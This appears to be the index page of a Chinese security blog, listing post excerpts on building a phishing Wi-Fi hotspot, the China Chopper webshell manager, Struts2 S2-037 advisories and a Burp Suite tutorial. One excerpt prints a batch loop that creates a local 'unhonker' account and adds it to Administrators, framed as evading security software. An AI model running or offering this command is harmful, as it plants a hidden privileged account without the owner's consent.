0nise's Blog ---1931se TeAm!

又一个
Emlog大前端主题
精彩文章

0nise带你玩转wifi钓鱼----钓鱼wifi搭建

阅读(343)评论(1)

0x00准备 有一句话是这么说的:工欲善其事,必先利其器。这里有几类工具是不可少的,没工具你玩的毛线啊: 1.kali(没kali扯什么?) 2.hostapd(创建无线热点) 3.dnsmasq(dns服务和dhcp服务) 0x01安装 1.安装hostapd apt-get install hostapd 2....

精彩文章

记代码剖析拿到的手机号

阅读(989)评论(2)

0x00起因 0x01围观 图片一发出 这是怎么回事,补天的大牛竟然不知道这是什么语(j)言(a)写(v)的(a) 于是乎我就放弃了打(L)游(O)戏(L)的时间,来帮忙看手机号,就有了这篇文章 0x02焦点 这段代码的焦点就是在这里 ...

共享资源

【转载】中国菜刀更新

阅读(413)评论(0)

0X01 简介 中国制造-黑客之刀 大家都知道中国菜刀是我们一些安全人事and黑客经常用的webshell管理工具 昨天我得知菜刀更新了,今天才去下载看的,尼玛,老兵蜀黍233 看看酷炫界面 0x02 下载 官网下载:http://www.maicaidao...

时代新闻

【转载】Struts2 S2-037漏洞检测方法及修复方案附工具

阅读(343)评论(0)

2016年5月12日,Apache官方发布安全通告S2-033(CVE-2016-3087),在开启动态方法调用(Dynamic Method Invocation)的情况下,攻击者使用REST插件调用恶意表达式可以远程执行代码。 2016年6月9日,Apache官方发布新的安全通告S2-037,与S2-033...

时代新闻

【转载】Struts2 037远程命令执行漏洞初步分析

阅读(280)评论(0)

在群里有人说struts2又出新漏洞了,当晚乌云就刷了起来,今天过来本地复现了一下,在这里说一下自己的分析结果(如果觉得我说错了还请指出) struts2介绍就不介绍了,个人感觉作为一个框架struts2是非常牛逼的,虽然现在出了很多安全问题 本地复现条件: java JDK 1.7 Tomcat 7.0...

时代新闻

【转载】Struts2 S2-037漏洞预警

阅读(1224)评论(0)

漏洞描述 Apache Struts2在使用REST插件的情况下,攻击者使用REST调用恶意表达式可以远程执行代码。该漏洞编号为CVE-2016-4438,定名S2-037。该漏洞和S2-033漏洞触发流程基本一致,都是在ActionMapping中methodName带入到OGNL表达式中执行,从...

精彩文章

burp suite 使用教程详解(外文翻译转)

阅读(1409)评论(2)

Burp Suite是Web应用程序测试的最佳工具之一,其多种功能可以帮我们执行各种任务.请求的拦截和修改,扫描web应用程序漏洞,以暴力破解登陆表单,执行会话令牌等多种的随机性检查。本文将做一个Burp Suite完全正的演练,主要讨论它的以下特点. 1.代理--Burp Suite带有一个代理,通过默认端口8080上运行,使用这个代理,我们可以截获并...

精彩文章

秒杀一切安全软件 —添加用户

阅读(1529)评论(4)

刚刚看到试了下真加了用户  for /l %%i in (1,1,1000) do @net user unhonker test /add&@net localgroup administrators unhonker /add 保存为bat格局运转,运转过程中安全狗会呈现阻拦提示,不必管它,指令运转完毕后能够...